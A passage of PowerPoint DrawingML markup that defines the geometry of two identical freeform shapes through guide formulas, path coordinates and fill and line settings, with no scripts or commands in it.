                  <a:gd name="T66" fmla="*/ 44 w 261"/>
                  <a:gd name="T67" fmla="*/ 213 h 249"/>
                  <a:gd name="T68" fmla="*/ 34 w 261"/>
                  <a:gd name="T69" fmla="*/ 216 h 249"/>
                  <a:gd name="T70" fmla="*/ 26 w 261"/>
                  <a:gd name="T71" fmla="*/ 218 h 249"/>
                  <a:gd name="T72" fmla="*/ 14 w 261"/>
                  <a:gd name="T73" fmla="*/ 212 h 249"/>
                  <a:gd name="T74" fmla="*/ 12 w 261"/>
                  <a:gd name="T75" fmla="*/ 210 h 249"/>
                  <a:gd name="T76" fmla="*/ 10 w 261"/>
                  <a:gd name="T77" fmla="*/ 197 h 249"/>
                  <a:gd name="T78" fmla="*/ 3 w 261"/>
                  <a:gd name="T79" fmla="*/ 190 h 249"/>
                  <a:gd name="T80" fmla="*/ 0 w 261"/>
                  <a:gd name="T81" fmla="*/ 174 h 249"/>
                  <a:gd name="T82" fmla="*/ 7 w 261"/>
                  <a:gd name="T83" fmla="*/ 165 h 249"/>
                  <a:gd name="T84" fmla="*/ 12 w 261"/>
                  <a:gd name="T85" fmla="*/ 158 h 249"/>
                  <a:gd name="T86" fmla="*/ 20 w 261"/>
                  <a:gd name="T87" fmla="*/ 166 h 249"/>
                  <a:gd name="T88" fmla="*/ 24 w 261"/>
                  <a:gd name="T89" fmla="*/ 163 h 249"/>
                  <a:gd name="T90" fmla="*/ 33 w 261"/>
                  <a:gd name="T91" fmla="*/ 163 h 249"/>
                  <a:gd name="T92" fmla="*/ 46 w 261"/>
                  <a:gd name="T93" fmla="*/ 161 h 249"/>
                  <a:gd name="T94" fmla="*/ 109 w 261"/>
                  <a:gd name="T95" fmla="*/ 149 h 249"/>
                  <a:gd name="T96" fmla="*/ 101 w 261"/>
                  <a:gd name="T97" fmla="*/ 114 h 249"/>
                  <a:gd name="T98" fmla="*/ 96 w 261"/>
                  <a:gd name="T99" fmla="*/ 69 h 249"/>
                  <a:gd name="T100" fmla="*/ 112 w 261"/>
                  <a:gd name="T101" fmla="*/ 1 h 249"/>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261"/>
                  <a:gd name="T154" fmla="*/ 0 h 249"/>
                  <a:gd name="T155" fmla="*/ 261 w 261"/>
                  <a:gd name="T156" fmla="*/ 249 h 249"/>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261" h="249">
                    <a:moveTo>
                      <a:pt x="116" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36084" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2546" y="2535"/>
                <a:ext cx="261" cy="249"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 261"/>
                  <a:gd name="T1" fmla="*/ 4 h 249"/>
                  <a:gd name="T2" fmla="*/ 167 w 261"/>
                  <a:gd name="T3" fmla="*/ 37 h 249"/>
                  <a:gd name="T4" fmla="*/ 192 w 261"/>
                  <a:gd name="T5" fmla="*/ 55 h 249"/>
                  <a:gd name="T6" fmla="*/ 211 w 261"/>
                  <a:gd name="T7" fmla="*/ 71 h 249"/>
                  <a:gd name="T8" fmla="*/ 222 w 261"/>
                  <a:gd name="T9" fmla="*/ 82 h 249"/>
                  <a:gd name="T10" fmla="*/ 232 w 261"/>
                  <a:gd name="T11" fmla="*/ 85 h 249"/>
                  <a:gd name="T12" fmla="*/ 242 w 261"/>
                  <a:gd name="T13" fmla="*/ 87 h 249"/>
                  <a:gd name="T14" fmla="*/ 243 w 261"/>
                  <a:gd name="T15" fmla="*/ 99 h 249"/>
                  <a:gd name="T16" fmla="*/ 260 w 261"/>
                  <a:gd name="T17" fmla="*/ 107 h 249"/>
                  <a:gd name="T18" fmla="*/ 260 w 261"/>
                  <a:gd name="T19" fmla="*/ 138 h 249"/>
                  <a:gd name="T20" fmla="*/ 252 w 261"/>
                  <a:gd name="T21" fmla="*/ 160 h 249"/>
                  <a:gd name="T22" fmla="*/ 229 w 261"/>
                  <a:gd name="T23" fmla="*/ 163 h 249"/>
                  <a:gd name="T24" fmla="*/ 211 w 261"/>
                  <a:gd name="T25" fmla="*/ 168 h 249"/>
                  <a:gd name="T26" fmla="*/ 198 w 261"/>
                  <a:gd name="T27" fmla="*/ 169 h 249"/>
                  <a:gd name="T28" fmla="*/ 185 w 261"/>
                  <a:gd name="T29" fmla="*/ 166 h 249"/>
                  <a:gd name="T30" fmla="*/ 166 w 261"/>
                  <a:gd name="T31" fmla="*/ 175 h 249"/>
                  <a:gd name="T32" fmla="*/ 160 w 261"/>
                  <a:gd name="T33" fmla="*/ 183 h 249"/>
                  <a:gd name="T34" fmla="*/ 152 w 261"/>
                  <a:gd name="T35" fmla="*/ 181 h 249"/>
                  <a:gd name="T36" fmla="*/ 141 w 261"/>
                  <a:gd name="T37" fmla="*/ 196 h 249"/>
                  <a:gd name="T38" fmla="*/ 133 w 261"/>
                  <a:gd name="T39" fmla="*/ 196 h 249"/>
                  <a:gd name="T40" fmla="*/ 126 w 261"/>
                  <a:gd name="T41" fmla="*/ 197 h 249"/>
                  <a:gd name="T42" fmla="*/ 119 w 261"/>
                  <a:gd name="T43" fmla="*/ 216 h 249"/>
                  <a:gd name="T44" fmla="*/ 110 w 261"/>
                  <a:gd name="T45" fmla="*/ 220 h 249"/>
                  <a:gd name="T46" fmla="*/ 109 w 261"/>
                  <a:gd name="T47" fmla="*/ 233 h 249"/>
                  <a:gd name="T48" fmla="*/ 105 w 261"/>
                  <a:gd name="T49" fmla="*/ 243 h 249"/>
                  <a:gd name="T50" fmla="*/ 99 w 261"/>
                  <a:gd name="T51" fmla="*/ 247 h 249"/>
                  <a:gd name="T52" fmla="*/ 95 w 261"/>
                  <a:gd name="T53" fmla="*/ 243 h 249"/>
                  <a:gd name="T54" fmla="*/ 92 w 261"/>
                  <a:gd name="T55" fmla="*/ 239 h 249"/>
                  <a:gd name="T56" fmla="*/ 84 w 261"/>
                  <a:gd name="T57" fmla="*/ 247 h 249"/>
                  <a:gd name="T58" fmla="*/ 74 w 261"/>
                  <a:gd name="T59" fmla="*/ 243 h 249"/>
                  <a:gd name="T60" fmla="*/ 64 w 261"/>
                  <a:gd name="T61" fmla="*/ 241 h 249"/>
                  <a:gd name="T62" fmla="*/ 56 w 261"/>
                  <a:gd name="T63" fmla="*/ 224 h 249"/>
                  <a:gd name="T64" fmla="*/ 52 w 261"/>
                  <a:gd name="T65" fmla="*/ 212 h 249"/>
                  <a:gd name="T66" fmla="*/ 44 w 261"/>
                  <a:gd name="T67" fmla="*/ 213 h 249"/>
                  <a:gd name="T68" fmla="*/ 34 w 261"/>
                  <a:gd name="T69" fmla="*/ 216 h 249"/>
                  <a:gd name="T70" fmla="*/ 26 w 261"/>
                  <a:gd name="T71" fmla="*/ 218 h 249"/>
                  <a:gd name="T72" fmla="*/ 14 w 261"/>
                  <a:gd name="T73" fmla="*/ 212 h 249"/>
                  <a:gd name="T74" fmla="*/ 12 w 261"/>
                  <a:gd name="T75" fmla="*/ 210 h 249"/>
                  <a:gd name="T76" fmla="*/ 10 w 261"/>
                  <a:gd name="T77" fmla="*/ 197 h 249"/>
                  <a:gd name="T78" fmla="*/ 3 w 261"/>
                  <a:gd name="T79" fmla="*/ 190 h 249"/>
                  <a:gd name="T80" fmla="*/ 0 w 261"/>
                  <a:gd name="T81" fmla="*/ 174 h 249"/>
                  <a:gd name="T82" fmla="*/ 7 w 261"/>
                  <a:gd name="T83" fmla="*/ 165 h 249"/>
                  <a:gd name="T84" fmla="*/ 12 w 261"/>
                  <a:gd name="T85" fmla="*/ 158 h 249"/>
                  <a:gd name="T86" fmla="*/ 20 w 261"/>
                  <a:gd name="T87" fmla="*/ 166 h 249"/>
                  <a:gd name="T88" fmla="*/ 24 w 261"/>
                  <a:gd name="T89" fmla="*/ 163 h 249"/>
                  <a:gd name="T90" fmla="*/ 33 w 261"/>
                  <a:gd name="T91" fmla="*/ 163 h 249"/>
                  <a:gd name="T92" fmla="*/ 46 w 261"/>
                  <a:gd name="T93" fmla="*/ 161 h 249"/>
                  <a:gd name="T94" fmla="*/ 109 w 261"/>
                  <a:gd name="T95" fmla="*/ 149 h 249"/>
                  <a:gd name="T96" fmla="*/ 101 w 261"/>
                  <a:gd name="T97" fmla="*/ 114 h 249"/>
                  <a:gd name="T98" fmla="*/ 96 w 261"/>
                  <a:gd name="T99" fmla="*/ 69 h 249"/>
                  <a:gd name="T100" fmla="*/ 112 w 261"/>
                  <a:gd name="T101" fmla="*/ 1 h 249"/>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261"/>
                  <a:gd name="T154" fmla="*/ 0 h 249"/>
                  <a:gd name="T155" fmla="*/ 261 w 261"/>
                  <a:gd name="T156" fmla="*/ 249 h 249"/>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261" h="249">
                    <a:moveTo>
                      <a:pt x="116" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="215"/>
                    </a:lnTo>
